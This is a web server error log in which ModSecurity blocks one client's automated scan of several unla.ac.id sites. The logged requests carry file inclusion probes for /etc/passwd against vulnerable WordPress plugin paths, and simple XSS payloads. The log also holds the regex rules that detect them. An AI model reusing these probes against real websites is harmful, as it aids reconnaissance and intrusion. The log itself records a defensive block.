[Tue Aug 29 11:53:24.120669 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php"] [unique_id "ZO15xMCo-f0AAAoqbSAAAAAj"]
[Tue Aug 29 11:53:24.124128 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php"] [unique_id "ZO15xMCo-f0AAAoW7PoAAAAJ"]
[Tue Aug 29 11:53:24.139547 2023] [:error] [pid 2612] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php"] [unique_id "ZO15xMCo-f0AAAo0gNYAAAAZ"]
[Tue Aug 29 11:53:24.648160 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php"] [unique_id "ZO15xMCo-f0AAAot8PkAAAAn"]
[Tue Aug 29 11:53:24.652240 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]: urls[<img src=x onerror=alert(document.domain)>]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15xMCo-f0AAAog@E8AAAAY"]
[Tue Aug 29 11:53:24.652860 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\bonerror\\\\b\\\\W*?\\\\=" at ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "133"] [id "958404"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: onerror= found within ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]: urls[<img src=x onerror=alert(document.domain)>]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15xMCo-f0AAAosCxkAAAAm"]
[Tue Aug 29 11:53:24.653257 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\bonerror\\\\b\\\\W*?\\\\=" at ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "133"] [id "958404"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: onerror= found within ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]: urls[<img src=x onerror=alert(document.domain)>]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15xMCo-f0AAAox7GcAAAAN"]
[Tue Aug 29 11:53:24.739468 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "ZO15xMCo-f0AAAowNosAAAAH"]
[Tue Aug 29 11:53:24.758693 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php"] [unique_id "ZO15xMCo-f0AAAfWOW4AAAAL"]
[Tue Aug 29 11:53:24.767766 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php"] [unique_id "ZO15xMCo-f0AAAoz71MAAAAS"]
[Tue Aug 29 11:53:24.768582 2023] [:error] [pid 2612] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php"] [unique_id "ZO15xMCo-f0AAAo0gNgAAAAZ"]
[Tue Aug 29 11:53:24.786400 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\bonerror\\\\b\\\\W*?\\\\=" at ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "133"] [id "958404"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: onerror= found within ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]: urls[<img src=x onerror=alert(document.domain)>]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15xMCo-f0AAAosCxsAAAAm"]
[Tue Aug 29 11:53:24.793180 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]: urls[<img src=x onerror=alert(document.domain)>]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15xMCo-f0AAAofm7YAAAAX"]
[Tue Aug 29 11:53:24.796149 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\bonerror\\\\b\\\\W*?\\\\=" at ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "133"] [id "958404"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: onerror= found within ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]: urls[<img src=x onerror=alert(document.domain)>]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15xMCo-f0AAAor7r8AAAAk"]
[Tue Aug 29 11:53:25.687242 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:query: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/search"] [unique_id "ZO15xcCo-f0AAAfWOXAAAAAL"]
[Tue Aug 29 11:53:25.839014 2023] [:error] [pid 2610] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "ZO15xcCo-f0AAAoyGzAAAAAI"]
[Tue Aug 29 11:53:25.840778 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:query: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/search"] [unique_id "ZO15xcCo-f0AAAoT7XkAAAAD"]
[Tue Aug 29 11:53:25.844053 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:query: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/search"] [unique_id "ZO15xcCo-f0AAAoz71UAAAAS"]
[Tue Aug 29 11:53:25.847039 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/blogtopdf/dompdf/dompdf.php"] [unique_id "ZO15xcCo-f0AAAoXJxEAAAAP"]
[Tue Aug 29 11:53:25.848422 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:query: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/search"] [unique_id "ZO15xcCo-f0AAAofm7kAAAAX"]
[Tue Aug 29 11:53:26.194472 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:query: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/search"] [unique_id "ZO15xsCo-f0AAAowNpAAAAAH"]
[Tue Aug 29 11:53:26.407298 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "ZO15xsCo-f0AAAoqbScAAAAj"]
[Tue Aug 29 11:53:27.327932 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAoT7X4AAAAD"]
[Tue Aug 29 11:53:27.476452 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "ZO15x8Co-f0AAAfWOXQAAAAL"]
[Tue Aug 29 11:53:27.476746 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAoW7QAAAAAJ"]
[Tue Aug 29 11:53:27.477613 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "ZO15x8Co-f0AAAofm7sAAAAX"]
[Tue Aug 29 11:53:27.483364 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/gboutique/library/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAoXJxYAAAAP"]
[Tue Aug 29 11:53:27.483966 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "ZO15x8Co-f0AAAn406EAAAAW"]
